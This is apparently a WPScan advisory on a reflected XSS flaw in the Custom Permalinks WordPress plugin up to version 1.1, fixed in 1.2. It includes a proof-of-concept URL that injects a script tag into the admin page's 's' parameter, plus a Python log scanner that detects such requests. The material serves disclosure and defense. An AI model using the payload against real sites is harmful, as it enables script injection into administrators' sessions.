Custom Permalinks <= 1.1 - Cross-Site Scripting (XSS)



Description
User-controllable input on the Custom Permalinks admin page (the `s` parameter shown in the proof of concept below) is output without any escaping.
Proof of Concept
URL/wp-admin/admin.php?page=custom-permalinks-post-permalinks&s=<script>alert(1)</script>
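
A defender-side check for the request shape in the proof of concept, as an added example (not code from this advisory, WPScan or the plugin): it scans web access logs for requests to the affected admin page whose `s` parameter carries markup characters. The combined log format, the `/wp-admin/admin.php` path suffix, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Page slug and parameter name come from the advisory's proof of concept.
PAGE_SLUG = "custom-permalinks-post-permalinks"
PARAM = "s"
# Characters needed to break out of an HTML text or attribute context.
MARKUP = re.compile(r"[<>\"']")
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines, not taken from any real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Feb/2018:10:00:00 +0000] "GET /wp-admin/admin.php'
    '?page=custom-permalinks-post-permalinks&s=%3Cscript%3Ealert(1)%3C/script%3E'
    ' HTTP/1.1" 200 5120',
    '203.0.113.8 - - [25/Feb/2018:10:01:00 +0000] "GET /wp-admin/admin.php'
    '?page=custom-permalinks-post-permalinks&s=summer-sale HTTP/1.1" 200 4096',
    '203.0.113.9 - - [25/Feb/2018:10:02:00 +0000] "GET /wp-admin/admin.php'
    '?page=custom-permalinks-post-permalinks&s=%253Cb%253E HTTP/1.1" 200 4100',
    '203.0.113.9 - - [25/Feb/2018:10:03:00 +0000] "GET /wp-admin/admin.php'
    '?page=other-plugin&s=%3Cb%3E HTTP/1.1" 200 900',
]


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so an over-encoded term is still inspected."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_search(log_line):
    """Return the decoded s value if it carries markup on the affected page, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    query = parse_qs(url.query, keep_blank_values=True)  # decodes one layer
    if not url.path.endswith("/wp-admin/admin.php") or PAGE_SLUG not in query.get("page", []):
        return None
    for raw in query.get(PARAM, []):
        term = fully_decode(raw)
        if MARKUP.search(term):
            return term
    return None
```

Hits on a site still running version 1.1 or earlier deserve follow-up, because that version reflects the term unescaped; on 1.2 and later they indicate probing only.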

Affects Plugin

Fixed in version 1.2

Classification

Type: XSS
OWASP Top 10: A3: Cross-Site Scripting (XSS)
CWE: CWE-79

Miscellaneous

Submitter: Karim El Ouerghemmi
Submitter Website: https://ripstech.com
Verified: No
WPVDB ID: 9030

Timeline

Publicly Published: 2018-02-22
Added: 2018-02-25
Last Updated: 2018-02-25
